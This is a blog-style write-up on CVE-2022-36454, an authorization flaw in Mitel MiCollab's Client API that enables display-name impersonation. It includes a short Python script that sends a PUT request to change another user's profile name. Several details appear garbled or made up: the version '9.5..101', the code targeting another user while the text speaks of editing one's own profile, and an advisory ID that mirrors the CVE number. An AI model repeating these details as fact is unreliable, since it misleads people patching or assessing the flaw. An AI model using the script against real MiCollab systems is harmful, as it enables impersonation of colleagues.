CVE-2022-36454: MiCollab Client API Vulnerability Allows Authenticated Attackers to Modify Profile Parameters and Impersonate Users

A newly discovered vulnerability (CVE-2022-36454) in the MiCollab Client API of Mitel's MiCollab through version 9.5..101 has raised security concerns among organizations relying on this popular collaboration platform for their daily operations. This vulnerability enables an authenticated attacker to modify their profile parameters due to improper authorization controls, allowing them to potentially impersonate another user's name in the system. This long-read post will delve into the details of the exploit and provide links to pertinent sources for more information.

Background

Mitel MiCollab is a popular collaboration platform that combines voice, video, messaging, presence, audio/web conferencing, and team collaboration tools into a single solution. Recently, a vulnerability (CVE-2022-36454) was identified in the MiCollab Client API, affecting all versions up to and including 9.5..101.

Vulnerability Details

Due to improper authorization controls, an authenticated attacker could potentially modify their own profile parameters by taking advantage of the vulnerability. This could allow the attacker to impersonate another user's name and potentially gain unauthorized access to team resources or participate in sensitive discussions with other unsuspecting users.

Exploit

Here's a simple code snippet demonstrating how an attacker could exploit this vulnerability by sending a specially crafted HTTP request to the affected API endpoint:

import requests

# Attacker's authenticated session
session = requests.Session()
session.cookies.set("SESSION_ID", "attacker_session_id")

# Target user's unique identifier
target_user_id = "target_user_id"

# The new display name the attacker wants to use
new_display_name = "Impersonated User"

# API URL
url = "https://example.com/micollab/api/user/{}/profile";

# HTTP request headers
headers = {
    "Content-Type": "application/json"
}

# HTTP request payload
data = {
    "displayName": new_display_name
}

# Send the HTTP request
response = session.put(url.format(target_user_id), headers=headers, json=data)

# Print the API response
print(response.status_code, response.text)

Mitigation

Mitel has released a new version of MiCollab (9.5..102) to address this vulnerability. Users are advised to update to the latest version as soon as possible to ensure that their platforms are protected. The official Mitel advisory, along with the patch, can be found at the following link:

- Mitel Security Advisory (MSA-2022-36454)

Conclusion

While this vulnerability could potentially result in confidential information being accessed by unauthorized users, the good news is that it requires the attacker to be authenticated, which lessens the overall risk. However, it is still critical for organizations relying on the Mitel MiCollab platform to take the appropriate measures to mitigate this vulnerability by updating to the latest version, thus ensuring the continuing security of their collaboration activities.

For more information on this vulnerability and other related issues, refer to the resources below

- CVE-2022-36454
- National Vulnerability Database (NVD) Entry

Timeline

Published on: 10/25/2022 18:15:00 UTC
Last modified on: 10/28/2022 19:21:00 UTC